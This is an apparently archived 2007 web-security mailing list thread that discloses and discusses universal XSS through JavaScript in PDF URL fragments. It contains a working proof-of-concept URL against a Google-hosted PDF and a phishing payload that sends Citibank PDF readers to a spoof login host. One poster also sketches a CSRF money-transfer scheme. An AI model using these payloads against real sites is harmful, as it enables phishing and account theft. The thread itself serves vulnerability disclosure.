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Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

I'm most worried about the CSRF vector.

XSS attacks are easily preventable via a web app firewall, input
validation and/or session ID rotation; and I see a lot of frameworks
(like Drupal 4.7.4+) protect against CSRF via Form Keys and/or rotating
sessions. But I do not see a lot of custom commercial sites implement
solid CSRF protection quite yet.

So I'm thinking, locate a PDF that requires log-in to read; send a URL
to the PDF with a CSRF attack attached (please transfer money to me
swiss bank account), mass mail, the user clicks the link, legally logs
in, the pdf path points the user to the pdf w/ CSRF attached - and then

I'm new at this game, but am I thinking along the right path?

- Jim

Jean-Jacques Halans wrote:
> And it makes a great phishing hole too.
> Google for any banking pdf's
> and attach your fake banking site to let the user login to read the
> article.
> For example:
> Send out an email pretending to come from Citibank, about a new
> article on Wealth Management, with a link to the real article:
> http://www.citibank.com/privatebank/np_on_wm.pdf#something=javascript:var%20url=%22http://www.citibank.com/privatebank/%22;var%20temp=confirm(%22Dear%20Citibank%20Customer,\n\nPlease%20login%20to%20read%20the%20article.\nAfter%20login%20you%20will%20be%20returned%20to%20the%20article.\n\n%22);var%20url2=%22http://www.somecitibankspoofurl.com/fake_login_page%22;if(temp){document.location=url2}else{document.location=url}
> Notice the popup (in firefox) which says: "The page at
> http://www.citibank.com says:"
> JJ
> On 1/3/07, pdp (architect) <pdp.gnucitizen@xxxxxxxxxxxxxx> wrote:
>> I will be very quick and just point to links where you can read about
>> this issue.
>> It seams that PDF documents can execute JavaScript code for no
>> apparent reason by using the following template:
>> http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here
>> You must understand that the attacker doesn't need to have write
>> access to the specified PDF document. In order to get an XSS vector
>> working you need to have a PDF file hosted on the target and that's
>> all about it. The rest is just a matter of your abilities and desires.
>> This finding was originally mentioned by Sven Vetsch, on his blog.
>> This is a very good and quite interesting. Good work.
>> There is a POC I composed:
>> http://www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#something=javascript:function%20createXMLHttpRequest(){%20%20%20try{%20return%20new%20ActiveXObject('Msxml2.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20ActiveXObject('Microsoft.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20XMLHttpRequest();%20}catch(e){}%20%20%20return%20null;}var%20xhr%20=%20createXMLHttpRequest();xhr.onreadystatechange%20=%20function(){%20%20%20%20if%20(xhr.readyState%20==%204)%20%20%20%20%20%20%20%20alert(xhr.responseText);};xhr.open('GET',%20'http://www.google.com',%20true);xhr.send(null);
>> More on the matter can be found here:
>> http://www.gnucitizen.org/blog/danger-danger-danger/
>> http://www.disenchant.ch/blog/hacking-with-browser-plugins/34
>> -- 
>> pdp (architect) | petko d. petkov
>> http://www.gnucitizen.org
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Best Regards,
Jim Manico
GIAC GSEC Professional, Sun Certified Java Programmer